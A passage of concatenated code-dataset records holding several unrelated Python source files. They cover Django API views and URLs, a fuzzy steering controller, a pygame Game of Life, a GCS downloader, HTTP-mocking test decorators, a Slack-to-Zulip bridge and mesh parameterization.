bouquets successfully retrieved\", \"data\": results}, status=status.HTTP_200_OK)\n            else:\n                return Response({\"status\": False, \"data\":\"Could not retrieve data plans\"})\n            \n        except Exception as e:\n            print(str(e))\n            return Response({\"status\": False, \"data\": str(e)})\n\nclass GetElectricityDiscos(APIView):\n    def get(self, request):\n        try:\n            results = ElectricityDiscos.objects.all().values('public_id','disco_name','disco_code','api_provider','api_code')\n            disco_struct = []\n            for disco in range(len(results)):\n                disco_struct.append(results[disco])\n            return Response({\"status\": True, \"message\":\"Discos successfully retrieved\", \"data\": disco_struct}, status=status.HTTP_200_OK)\n        \n        except Exception as e:\n            return Response({\"status\": False, \"data\": str(e)})\n    \n","repo_name":"Pybool/Quickee","sub_path":"escrow-backend/utilities/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14465656551","text":"#importing libraries\nimport numpy as np\nimport skfuzzy as fuzz\nfrom skfuzzy import control as ctrl\nimport matplotlib\n#configuring input and output variables\nrange_of_y = 1000\ny=ctrl.Antecedent(np.arange(0,range_of_y+0.1,0.01),'lateral lane displacement')\nrange_of_acc= 300\ny_acc=ctrl.Antecedent(np.arange(0,range_of_acc,0.001),'lateral accelaration')\nerror=100\ne=ctrl.Antecedent(np.arange(-error,error,0.1),'error')\ny['first']=fuzz.trapmf(y.universe,[0,range_of_y/16,3*range_of_y/16,4*range_of_y/16])\ny['second']=fuzz.trapmf(y.universe,[5*range_of_y/16,6*range_of_y/16,7*range_of_y/16,8*range_of_y/16])\ny['third']=fuzz.trapmf(y.universe,[9*range_of_y/16,10*range_of_y/16,11*range_of_y/16,12*range_of_y/16])\ny['final']=fuzz.trapmf(y.universe,[13*range_of_y/16,14*range_of_y/16,15*range_of_y/16,16*range_of_y/16])\ny_acc['GT0']=fuzz.trimf(y_acc.universe,[1,range_of_acc/2,range_of_acc])\ny_acc['GE0']=fuzz.trimf(y_acc.universe,[0,range_of_acc/2,range_of_acc])\ny_acc['LTM']=fuzz.trimf(y_acc.universe,[-range_of_acc,0,range_of_acc-1])\ny_acc['GEM']=fuzz.trimf(y_acc.universe,[range_of_acc,range_of_acc,range_of_acc])\ny_acc['GT-M']=fuzz.trimf(y_acc.universe,[-range_of_acc+1,0,range_of_acc])\ny_acc['LE-M']=fuzz.trimf(y_acc.universe,[-range_of_acc,-range_of_acc,-range_of_acc])\ny_acc['LT0']=fuzz.trimf(y_acc.universe,[-range_of_acc,-range_of_acc/2,-1])\ny_acc['LE0']=fuzz.trimf(y_acc.universe,[-range_of_acc,-range_of_acc/2,0])\ne['N']=fuzz.trimf(e.universe,[-error,-error,-1])\ne['Z']=fuzz.trimf(e.universe,[-error/2,0,error/2])\ne['P']=fuzz.trimf(e.universe,[1,error,error])\n\nstear_angle=0.006\nangle=ctrl.Consequent(np.arange(-stear_angle,stear_angle,0.0001),'stear_angle')\nangle['s1']=fuzz.trimf(angle.universe,[0,0.0006/2,0.0006])\nangle['b1']=fuzz.trimf(angle.universe,[0.00060001,0.0017,0.0034])\nangle['b2']=fuzz.trimf(angle.universe,[0.0034001,0.0037,0.004])\nangle['b3']=fuzz.trimf(angle.universe,[0.004001,0.0043,0.0046])\nangle['s1']=fuzz.trimf(angle.universe,[0,0.0006/2,0.0006])\nangle['b1']=fuzz.trimf(angle.universe,[0.00060001,0.0017,0.0034])\nangle['b2']=fuzz.trimf(angle.universe,[0.0034001,0.0037,0.004])\nangle['b3']=fuzz.trimf(angle.universe,[0.004001,0.0043,0.0046])\nangle['-s1']=fuzz.trimf(angle.universe,[-0.0006,-0.0006/2,0])\nangle['-b1']=fuzz.trimf(angle.universe,[-0.0034,-0.0017,-0.00060001])\nangle['-b2']=fuzz.trimf(angle.universe,[-0.004,-0.0037,-0.0034001])\nangle['-b3']=fuzz.trimf(angle.universe,[-0.0046,-0.0043,-0.004001])\nangle['0']=fuzz.trimf(angle.universe,[0,0,0])\n \n#rules\nrule1=ctrl.Rule(y['first'] & y_acc['LTM'] & e['N'],angle['b3'])\nrule2=ctrl.Rule(y['first'] & y_acc['LTM'] & e['Z'],angle['b2'])\nrule3=ctrl.Rule(y['first'] & y_acc['LTM'] & e['P'],angle['b1'])\nrule4=ctrl.Rule(y['first'] & y_acc['GEM'] & e['N'],angle['-s1'])\nrule5=ctrl.Rule(y['first'] & y_acc['GEM'] & e['Z'],angle['0'])\nrule6=ctrl.Rule(y['first'] & y_acc['GEM'] & e['P'],angle['-s1'])\nrule7=ctrl.Rule(y['second'] & y_acc['GT0'] & e['N'],angle['-b1'])\nrule8=ctrl.Rule(y['second'] & y_acc['GT0'] & e['Z'],angle['-b2'])\nrule9=ctrl.Rule(y['second'] & y_acc['GT0'] & e['P'],angle['-b3'])\nrule10=ctrl.Rule(y['second'] & y_acc['LE0'] & e['N'],angle['s1'])\nrule11=ctrl.Rule(y['second'] & y_acc['LE0'] & e['Z'],angle['0'])\nrule12=ctrl.Rule(y['second'] & y_acc['LE0'] & e['P'],angle['-s1'])\nrule13=ctrl.Rule(y['third'] & y_acc['GT-M'] & e['N'],angle['-b1'])\nrule14=ctrl.Rule(y['third'] & y_acc['GT-M'] & e['Z'],angle['-b2'])\nrule15=ctrl.Rule(y['third'] & y_acc['GT-M'] & 
e['P'],angle['-b3'])\nrule16=ctrl.Rule(y['third'] & y_acc['LE-M'] & e['N'],angle['s1'])\nrule17=ctrl.Rule(y['third'] & y_acc['LE-M'] & e['Z'],angle['0'])\nrule18=ctrl.Rule(y['third'] & y_acc['LE-M'] & e['P'],angle['-s1'])\nrule19=ctrl.Rule(y['final'] & y_acc['LT0'] & e['N'],angle['-b1'])\nrule20=ctrl.Rule(y['final'] & y_acc['LT0'] & e['Z'],angle['-b2'])\nrule21=ctrl.Rule(y['final'] & y_acc['LT0'] & e['P'],angle['-b3'])\nrule22=ctrl.Rule(y['final'] & y_acc['GE0'] & e['N'],angle['s1'])\nrule23=ctrl.Rule(y['final'] & y_acc['GE0'] & e['Z'],angle['0'])\nrule24=ctrl.Rule(y['final'] & y_acc['GE0'] & e['P'],angle['-s1'])\n\n#feeding rules to ControlSystem\ndla_ctrl=ctrl.ControlSystem([rule1,rule2,rule3,rule4,rule5,rule6,rule7,rule8,rule9,rule10,rule11,rule12,rule13,rule14,rule15,rule16,rule17,rule18,rule19,rule20,rule21,rule22,rule23,rule24])\ndla=ctrl.ControlSystemSimulation(dla_ctrl)\n","repo_name":"sairavitejailla/Lane-Change-maneuver--Fuzzy-Logic","sub_path":"fuzzyControl.py","file_name":"fuzzyControl.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8685868705","text":"import pygame\nfrom sys import exit\nfrom settings import *\nfrom grid import Grid\n\n\nclass Game():\n\n\tdef __init__(self) -> None:\n\t\tpygame.init()\n\t\tself.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n\t\tpygame.display.set_caption(\"Conway's Game of Life\")\n\t\tself.clock = pygame.time.Clock()\n\t\tself.grid = Grid()\n\t\tself.started = False\n\n\n\tdef __call__(self) -> None:\n\t\tself.run()\n\n\t# Main game loop\n\tdef run(self) -> None:\n\t\twhile True:\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\texit()\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_RETURN:\n\t\t\t\t\t\tself.started = not self.started\n\t\t\t\t\telif event.key == pygame.K_r and not self.started:\n\t\t\t\t\t\tself.grid.reset()\n\n\t\t\t\tif not self.started:\n\t\t\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\t\t\tpos = pygame.mouse.get_pos()\n\t\t\t\t\t\tself.grid.check_click(pos)\n\n\t\t\tself.screen.fill(BLACK)\n\t\t\tif self.started:\n\t\t\t\tself.grid.update()\n\t\t\tself.grid.draw()\n\t\t\tpygame.display.update()\n\t\t\t\n\t\t\tself.clock.tick(FPS)","repo_name":"andreimihai2305/conways-game-of-life","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70572683689","text":"kor = '포도'\neng = 'grape'\nd = dict(eng='apple', kor='사과')\n\ns = 'The English word for {kor} is {eng}.'\nprint(s.format(**locals()))\nprint(s.format(**d))\n\nd = {'stock_items': ['pen','pencil', 'envelope', 'paper clip','notepad']}\nprint('The items we currently have in stock are {stock_items[0]}, {stock_items[2]}.'.format(**d))","repo_name":"bellepoque7/Python_Intro","sub_path":"Python_Intro/2.[End]SNU_BDI_Python_II/02Day/02String_Formatting/02(Un)Unpacking.py","file_name":"02(Un)Unpacking.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42699821185","text":"from django.contrib import admin\nfrom django.urls import path, include, re_path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    # djoser\n    path('auth/', include('djoser.urls')),\n    
path('auth/', include('djoser.urls.jwt')),\n path('auth/', include('djoser.social.urls')),\n # apps\n path('auth/', include('apps.accounts.urls')),\n path('api/products/', include('apps.product.urls')),\n path('api/shopping_cart/', include('apps.shopping_cart.urls')),\n path('api/payment/', include('apps.payment.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"LDA407/api_para_vender_ropas","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1983190373","text":"import argparse\nimport logging\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\nfrom src.utils.argparser import create_dataextractor_parser\nfrom src.utils.io import download_from_bucket, get_downstream_dir\n\n# from numpy.typing import DTypeLike\n\n\n_logger = logging.getLogger(__name__)\n_handler = logging.StreamHandler()\n_handler.setStream(tqdm)\n_logger.addHandler(_handler)\n\n\nclass Extractor:\n def __init__(\n self,\n gcs_dir: Path,\n output_path: Path = get_downstream_dir(),\n ):\n self._gcs_dir = gcs_dir\n self._output_path = output_path\n\n def get(self, file: str):\n \"\"\"\n\n Args:\n file: specify value of gcs file path\n\n Returns:\n \"\"\"\n gcs_path = self._gcs_dir.joinpath(file)\n file_path = self._output_path.joinpath(file)\n download_from_bucket(file_path, gcs_path)\n\n\ndef main():\n dataextractor_parser = create_dataextractor_parser()\n parser = argparse.ArgumentParser(parents=[dataextractor_parser])\n args = parser.parse_args()\n extractor = Extractor(args.gcs_dir)\n _logger.info(\"Fetching and Saving data from gcs\")\n for file in args.files:\n _logger.info(f\"start Getting data --- path: {args.gcs_dir}/{file}\")\n extractor.get(file)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n main()\n","repo_name":"mzk622/BERT-for-PAS","sub_path":"src/dataextractor/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14960893582","text":"\"\"\"Test decorators.\"\"\"\n\nimport json\nimport os\nfrom functools import wraps\n\nimport requests\n\n\ndef parse_response_to_json(func):\n \"\"\"Decorator that parses the response body into JSON and passes it to the\n function, then it saves the changes into the response body again.\n \"\"\"\n\n @wraps(func)\n def wrapper(response):\n try:\n json_response = json.loads(response[\"body\"][\"string\"])\n except (json.decoder.JSONDecodeError, UnicodeDecodeError):\n json_response = {}\n response, json_response = func(response, json_response)\n if response is not None and json_response:\n response[\"body\"][\"string\"] = json.dumps(json_response).encode()\n return response\n\n return wrapper\n\n\ndef assert_authorization(func):\n \"\"\"Decorator that ensures that the API key is being passed to our\n endpoints, and the login endpoint is called if email/password is provided.\n \"\"\"\n\n @wraps(func)\n def wrapper(*args, mocker, **kwargs):\n host = os.getenv(\"GENCOVE_HOST\")\n api_key = os.getenv(\"GENCOVE_API_KEY_TEST\")\n email = os.getenv(\"GENCOVE_EMAIL_TEST\")\n password = os.getenv(\"GENCOVE_PASSWORD_TEST\")\n using_api_key = os.getenv(\"USING_API_KEY\")\n\n def 
mock_get_auth(url, *args, headers, **kwargs):\n if host in url and using_api_key:\n assert (\n headers[\"Authorization\"] == f\"Api-Key {api_key}\"\n ), f\"No valid authorization header provided for GET-{url}\"\n kwargs[\"headers\"] = headers\n return requests.get(url, *args, **kwargs)\n\n mocker.patch(\"gencove.client.get\", side_effect=mock_get_auth)\n login_called = False\n\n def mock_post_auth(url, data, *args, headers, **kwargs):\n nonlocal login_called\n if host in url and using_api_key:\n assert (\n headers[\"Authorization\"] == f\"Api-Key {api_key}\"\n ), f\"No valid authorization header provided for POST-{url}\"\n elif host in url:\n if url.endswith(\"jwt-create/\"):\n login_called = True\n data_json = json.loads(data)\n assert data_json[\"email\"] == email\n assert data_json[\"password\"] == password\n else:\n assert \"Bearer \" in headers.get(\"Authorization\")\n kwargs[\"headers\"] = headers\n return requests.post(url, data, *args, **kwargs)\n\n mocker.patch(\"gencove.client.post\", side_effect=mock_post_auth)\n kwargs[\"mocker\"] = mocker\n func(*args, **kwargs)\n if not using_api_key:\n assert login_called, \"jwt-create endpoint was not called\"\n\n return wrapper\n\n\ndef assert_no_requests(func):\n \"\"\"Decorator that mocks get, post and delete and asserts that\n none of those methods are called\n \"\"\"\n\n @wraps(func)\n def wrapper(*args, mocker, **kwargs):\n mock_get = mocker.patch(\"gencove.client.get\")\n mock_post = mocker.patch(\"gencove.client.post\")\n mock_delete = mocker.patch(\"gencove.client.delete\")\n\n kwargs[\"mocker\"] = mocker\n func(*args, **kwargs)\n\n mock_get.assert_not_called()\n mock_post.assert_not_called()\n mock_delete.assert_not_called()\n\n return wrapper\n","repo_name":"gncv/gencove-cli","sub_path":"gencove/tests/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6915499011","text":"from flask_login import current_user\nfrom integration.utilities import slackHeader, parseZulipRC\nfrom requests import post, get, patch\n\n\ndef zulipWebhook(topic, content, **kwargs):\n \"\"\"\n Post a message to Zulip.\n\n :param topic: Topic to send the message to\n :type topic: String\n\n :param content: A Zulip formatted string\n :type content: String\n\n :param kwargs: Files\n :type kwargs: List of Tuples that contains a filename and URL\n \"\"\"\n\n zulipAuth = parseZulipRC(current_user.zulipBotRC)\n slackAuth = slackHeader(current_user.slackToken)\n\n message = {\n \"type\": \"stream\",\n \"to\": \"Slack\",\n \"topic\": topic,\n \"content\": content\n }\n\n files = kwargs.get('files')\n if files is not None:\n for (filename, fileurl) in files:\n # Get the raw content of the uploaded Slack file, by providing authentication to private URL\n fileFromSlack = get(fileurl, headers=slackAuth)\n # ensure file is under the 25MB Zulip limit\n if int(fileFromSlack.headers['content-Length']) < 25_000_000:\n result = post(zulipAuth['site'] + '/api/v1/user_uploads', files={'filename': (filename, fileFromSlack.content)}, auth=(zulipAuth['email'], zulipAuth['key']))\n message['content'] += f\"[{filename}]({result.json()['uri']})\" + \"\\n\"\n else:\n message['content'] += f\"File too large to display directly [{filename}]({fileurl})\" + \"\\n\"\n\n # post the message to Zulip\n post(zulipAuth['site'] + \"/api/v1/messages\", auth=(zulipAuth['email'], zulipAuth['key']), data=message)\n\n return \"Message sent\"\n\n\ndef 
getZulipTopicList():\n    \"\"\"\n    Get a list of topics in the Zulip workspace.\n    \"\"\"\n    zulipAuth = parseZulipRC(current_user.zulipBotRC)\n\n    getAllTopicsRequest = get(zulipAuth['site'] + f\"/api/v1/users/me/{getStreamID()}/topics\", auth=(zulipAuth['email'], zulipAuth['key']))\n    getAllTopicsRequest = getAllTopicsRequest.json()['topics']\n\n    return [topic['name'] for topic in getAllTopicsRequest]\n\n\ndef getStreamID(streamName='Slack'):\n    \"\"\"\n    By default get the StreamID of the Slack stream in Zulip.\n\n    :param streamName: The stream name to find the ID of, by default 'Slack'\n    :type streamName: String\n    \"\"\"\n    zulipAdminAuth = parseZulipRC(current_user.zulipAdminRC)\n    return get(zulipAdminAuth['site'] + \"/api/v1/get_stream_id\", auth=(zulipAdminAuth['email'], zulipAdminAuth['key']), params={'stream' : streamName}).json()['stream_id']\n\n\ndef deleteTopic(topicName):\n    \"\"\"\n    Given a topic name delete it from Zulip if it exists\n\n    :param topicName: Name of topic to delete\n    :type topicName: String\n    \"\"\"\n    zulipAdminAuth = parseZulipRC(current_user.zulipAdminRC)\n\n    # Delete method from api, not currently added to documentation but live: https://github.com/zulip/zulip/commit/ac55a5222c977ae2c507fb34ec5081c6ab018c16\n    post(zulipAdminAuth['site'] + \"/json/streams/\" + str(getStreamID()) + \"/delete_topic\", data={\"topic_name\": topicName}, auth=(zulipAdminAuth['email'], zulipAdminAuth['key']))\n\n\ndef renameTopic(oldName, newName):\n    \"\"\"\n    Rename a topic in the Zulip workspace.\n\n    :param oldName: The old channel name\n    :type oldName: String\n\n    :param newName: The new channel name\n    :type newName: String\n\n    \"\"\"\n    zulipAuth = parseZulipRC(current_user.zulipBotRC)\n\n    params = {'anchor': 'newest',\n              'num_before': 1,\n              'num_after': 0,\n              'narrow': '[{\"operator\": \"stream\", \"operand\" : \"Slack\"}, {\"operator\" : \"topic\", \"operand\" : \"' + oldName + '\"}]'\n              }\n\n    messageID = get(zulipAuth['site'] + \"/api/v1/messages\", auth=(zulipAuth['email'], zulipAuth['key']), params=params)\n    messageID = messageID.json()\n    try:\n        messageID = messageID['messages'][0]['id']\n    except (KeyError, IndexError):\n        messageID = None\n\n    if messageID is not None:\n        message = {\n            'topic': newName,\n            'propagate_mode': 'change_all'\n        }\n\n        # change all the messages to have a new topic\n        patch(zulipAuth['site'] + \"/api/v1/messages/\" + str(messageID), auth=(zulipAuth['email'], zulipAuth['key']), data=message)","repo_name":"fentonreid/SlackZulipIntegration","sub_path":"integration/webhooks/zulipWebHook.py","file_name":"zulipWebHook.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27427136475","text":"'''\nfor open mesh parameterization\n'''\nfrom copy import deepcopy\nfrom functools import reduce\nimport numpy_indexed as npi\nfrom scipy.sparse import csc_matrix\nfrom scipy.sparse.linalg import spsolve\nfrom tqdm import tqdm\nfrom utils import *\n\n'''\nreturn (\n    inn_verts: list,\n    bnd_verts: list\n)\n'''\ndef split_bnd_inn(msh: Trimesh) -> tuple:\n    bnd_edges = npi.difference(msh.edges_unique, msh.face_adjacency_edges)\n\n    bnd_verts = np.array([*bnd_edges[0]])\n    bnd_edges = np.delete(bnd_edges, [0], axis=0)\n\n    success = True\n    while success:\n        success = False\n        last = bnd_verts[-1]\n        for idx, edge in enumerate(bnd_edges):\n            if last == edge[0]:\n                success = True\n                last = edge[1]\n            elif last == edge[1]:\n                success = True\n                last = edge[0]\n            if success:\n                bnd_verts = np.append(bnd_verts, 
last)\n                bnd_edges = np.delete(bnd_edges, [idx], axis=0)\n                break\n\n    inn_verts = npi.difference(msh.face_adjacency_edges.flatten(), bnd_verts)\n    return (inn_verts, bnd_verts)\n\n'''\nparameterize mesh boundary to square (with pivot limits)\nreturn f_B: list\n'''\ndef mapping_boundary(msh: Trimesh, bnd_verts: list, pivots: list, scale: float=2.) -> list:\n    # find pivots[0] in bnd_verts, and shift it to the first with rotate\n    _bak = deepcopy(bnd_verts)\n    bnd_verts = np.roll(bnd_verts, -np.where(bnd_verts == pivots[0])[0][0])\n    # split bnd_verts into 4 parts\n    splitted = np.split(bnd_verts, [\n        np.where(bnd_verts == pivots[1])[0][0],\n        np.where(bnd_verts == pivots[2])[0][0],\n        np.where(bnd_verts == pivots[3])[0][0],\n    ])\n    for sub_bnd in splitted:\n        if len(sub_bnd) == 0:\n            # reverse order of _bak\n            print('reverse')\n            # bnd_verts = np.append([bnd_verts[0]], bnd_verts[1:][::-1])\n            return mapping_boundary(msh, _bak[::-1], pivots, scale)\n\n    print('bound: ', bnd_verts[:3])\n    # mapping_fixed_boundary also returns the closed boundary list; only f_B is needed here\n    f_B, _ = mapping_fixed_boundary(msh, bnd_verts, scale)\n    \n    return f_B\n\ndef mapping_fixed_boundary(msh: Trimesh, bnds: list, scale: float) -> list:\n    bnds = np.append(bnds, bnds[0])\n    bnd_size = len(bnds)\n    lengths = sum([mesh_vert_dist(msh, *bnds[i:i+2]) for i in range(bnd_size - 1)])\n    f_B = np.empty((0, 2))\n\n    last_v = bnds[0]\n    bnds = bnds[1:]\n    accumed = 0.\n    _first = 3\n    for bnd in bnds: # last_v to bnd\n        old_ratio = accumed / lengths\n        accumed += mesh_vert_dist(msh, last_v, bnd)\n        new_ratio = accumed / lengths\n        flag = -reduce(\n            lambda x, y: x * (\n                1 if ((y - old_ratio) * (y - new_ratio)) > 0 \n                else -y\n            ),\n            [0.25, 0.5, 0.75],\n            1\n        )\n        if flag > 0:\n            new_ratio = flag\n        vpos = (0., 0.)\n        if new_ratio < 0.25:\n            vpos = (-(scale / 2) + scale * (new_ratio / 0.25), scale / 2)\n        elif new_ratio < 0.5:\n            vpos = (scale / 2, (scale / 2) - scale * ((new_ratio - 0.25) / 0.25))\n        elif new_ratio < 0.75:\n            vpos = ((scale / 2) - scale * ((new_ratio - 0.5) / 0.25), -scale / 2)\n        else:\n            vpos = (-scale / 2, -(scale / 2) + scale * ((new_ratio - 0.75) / 0.25))\n        if _first > 0:\n            _first -= 1\n            print('bound:', bnd, 'vpos:', vpos)\n        f_B = np.append(f_B, [vpos], axis=0)\n        last_v = bnd\n    print('last bound:', last_v, 'vpos:', f_B[-1])\n    print('first bound:', bnds[0])\n    return f_B, bnds\n\ndef mapping_1_boundary(msh: Trimesh, sub_bnds: list, last_idx: int, scale: float) -> list:\n    '''\n    Split the boundary into four parts and map one of them onto the top edge,\n    between (-scale/2, scale/2) and (scale/2, scale/2); the other three parts\n    can then be pieced together by rotation.\n    '''\n    sub_bnds = np.append(sub_bnds, last_idx)\n    bnd_size = len(sub_bnds)\n    lengths = [mesh_vert_dist(msh, *sub_bnds[i:i+2]) for i in range(bnd_size - 1)]\n    # lengths normalized to 0~1\n    lengths = np.array(lengths) / sum(lengths)\n    # lengths accumulated\n    _acc_lens = np.cumsum(lengths)\n    _acc_lens -= _acc_lens[0]\n    # mapping lengths to (-scale/2, scale/2) and (scale/2, scale/2)\n    _x = _acc_lens * scale - scale / 2\n    _y = np.ones(bnd_size) * scale / 2\n    # combine x and y zip to list\n    return np.array(list(zip(_x, _y)))\n\ndef __rotate_90(pnts: list, times: int) -> list:\n    # pnts is ndarray shape (n, 2)\n    # rotate theta angle around (0, 0)\n    rot_mat = np.array([[0, -1], [1, 0]])\n    for _ in range(times):\n        pnts = np.dot(pnts, rot_mat)\n    return pnts\n\n'''\n*** initial weights ***\n'''\ndef initialize_weights(msh: Trimesh, inn_verts: list, bnd_verts: list) -> csc_matrix:\n    # sub function\n    def weights_for_edge(edge: list) -> float:\n        adj_list_s = msh.vertex_neighbors[edge[0]]\n        adj_list_b = msh.vertex_neighbors[edge[1]]\n        adj_vts = npi.intersection(adj_list_s, adj_list_b)\n        # 
assert len(adj_vts) == 2, 'not a manifold'\n        # compute cotangent weight of edge\n        ang1 = mesh_vert_angle(msh, adj_vts[0], *edge)\n        ang2 = mesh_vert_angle(msh, adj_vts[1], *edge)\n        _w = (math_cot(ang1) + math_cot(ang2)) / 2\n        return -_w\n\n    # sparse matrix index\n    sp_row = np.array([], dtype=int)\n    sp_col = np.array([], dtype=int)\n    sp_data = np.array([], dtype=float)\n    mtx_diag = np.zeros(len(msh.vertices))\n    # generate\n    _weights = list(map(weights_for_edge, tqdm(msh.face_adjacency_edges, desc='generating weights')))\n    # update diag\n    for idx, edge in enumerate(msh.face_adjacency_edges):\n        mtx_diag[edge[0]] += -_weights[idx]\n        mtx_diag[edge[1]] += -_weights[idx]\n    \n    # transpose indices\n    _indices = msh.face_adjacency_edges.T\n    sp_row = np.hstack([sp_row, _indices[0], _indices[1]])\n    sp_col = np.hstack([sp_col, _indices[1], _indices[0]])\n    sp_data = np.hstack([sp_data, _weights, _weights])\n\n    # handle diag sparse index\n    # all vertices in msh with order {INNER, BOUND}\n    sp_diag_index = np.append(inn_verts, bnd_verts)\n    sp_row = np.hstack([sp_row, sp_diag_index])\n    sp_col = np.hstack([sp_col, sp_diag_index])\n    sp_diag_data = [mtx_diag[v] for v in sp_diag_index]\n    sp_data = np.hstack([sp_data, sp_diag_data])\n\n    sp_weights = csc_matrix((sp_data, (sp_row, sp_col)), dtype=float)\n    return sp_weights\n\n\n'''\nsplit sp_weights into sp_weights_II and sp_weights_IB\nand solve equation:\n    sp_weights_II * f_I = -sp_weights_IB * f_B\n'''\ndef solve_equation(sp_weights: csc_matrix, f_B: list, inn_verts: list, bnd_verts: list) -> list:\n    _mid = sp_weights[inn_verts, ...]\n    sp_weights_II = _mid[..., inn_verts]\n    sp_weights_IB = _mid[..., bnd_verts]\n\n    assert sp_weights_IB.shape[1] == len(f_B), f'L_IB({sp_weights_IB.shape[1]}) * f_B({len(f_B)}) illegal'\n\n    f_I = spsolve(sp_weights_II, -sp_weights_IB * f_B)\n    return f_I\n\n\n'''\nbuild param mesh by inverse mapping\nassume Z=0 in param mesh\n'''\ndef build_param_mesh(msh: Trimesh, inn_verts: list, bnd_verts: list, f_I: list, f_B: list) -> Trimesh:\n    len_inn, len_bnd = len(inn_verts), len(bnd_verts)\n    param_bnd_verts = [v + len_inn for v in range(len_bnd)]\n    inv_mapping = dict(zip(bnd_verts, param_bnd_verts))\n    param_inn_verts = [v for v in range(len_inn)]\n    inv_mapping.update(zip(inn_verts, param_inn_verts))\n    param_tot = np.append(f_I, f_B, axis=0)\n    # param_tot add new column Z=0\n    param_tot = np.hstack([param_tot, np.zeros((len(param_tot), 1))])\n\n    param_mesh = Trimesh(\n        vertices=[param_tot[inv_mapping[i]] for i in range(len_inn + len_bnd)],\n        faces=deepcopy(msh.faces)\n    )\n    print('check: ', param_mesh.vertices[bnd_verts[0]], 'for', bnd_verts[0])\n    param_mesh.remove_degenerate_faces()\n    param_mesh.remove_duplicate_faces()\n    param_mesh.remove_infinite_values()\n    return param_mesh\n\ndef build_str_mesh_custom(uns_mesh: Trimesh, param_mesh: Trimesh, sample_pnts: list, scale: float=2.) 
-> Trimesh:\n square_nums = len(sample_pnts)\n assert square_nums > 4, 'sample points illegal'\n sample_nums = int(square_nums ** 0.5)\n # flatten numpy elements to list will accelerate in cycle\n flt_faces = param_mesh.faces.tolist()\n flt_area_faces = param_mesh.area_faces.tolist()\n str_mesh = Trimesh()\n\n sample_trias = param_mesh.nearest.on_surface(sample_pnts)\n sample_trias = sample_trias[2].tolist()\n spot_trias = list(map(lambda tri: flt_faces[tri], sample_trias))\n vijk_areas = [\n [\n mesh_trias_area(\n sample_pnts[idx],\n param_mesh.vertices[spot_trias[idx][1]],\n param_mesh.vertices[spot_trias[idx][2]]\n ),\n mesh_trias_area(\n param_mesh.vertices[spot_trias[idx][0]],\n sample_pnts[idx],\n param_mesh.vertices[spot_trias[idx][2]]\n ),\n mesh_trias_area(\n param_mesh.vertices[spot_trias[idx][0]],\n param_mesh.vertices[spot_trias[idx][1]],\n sample_pnts[idx],\n )\n ]\n for idx in range(square_nums)\n ]\n\n str_pnts = [\n (\n vijk_areas[idx][0] * uns_mesh.vertices[spot_trias[idx][0]] +\n vijk_areas[idx][1] * uns_mesh.vertices[spot_trias[idx][1]] +\n vijk_areas[idx][2] * uns_mesh.vertices[spot_trias[idx][2]]\n ) / flt_area_faces[sample_trias[idx]]\n for idx in range(square_nums)\n ]\n\n half_trias1 = [\n [ir * sample_nums + ic, ir * sample_nums + ic - sample_nums, ir * sample_nums + ic - 1]\n for ir in range(1, sample_nums) for ic in range(1, sample_nums)\n ]\n half_trias2 = [\n [ir * sample_nums + ic - 1, ir * sample_nums + ic - sample_nums, ir * sample_nums + ic - sample_nums - 1]\n for ir in range(1, sample_nums) for ic in range(1, sample_nums)\n ]\n\n str_mesh.vertices = str_pnts\n str_mesh.faces = np.vstack([half_trias1, half_trias2])\n\n str_mesh.remove_infinite_values()\n str_mesh.remove_degenerate_faces()\n str_mesh.remove_unreferenced_vertices()\n str_mesh.fill_holes()\n str_mesh.fix_normals()\n\n return str_mesh\n\n'''\nbuild str mesh by sample vertices on param mesh\n'''\ndef build_str_mesh(uns_mesh: Trimesh, param_mesh: Trimesh, sample_nums: int=50, scale: float=2.) 
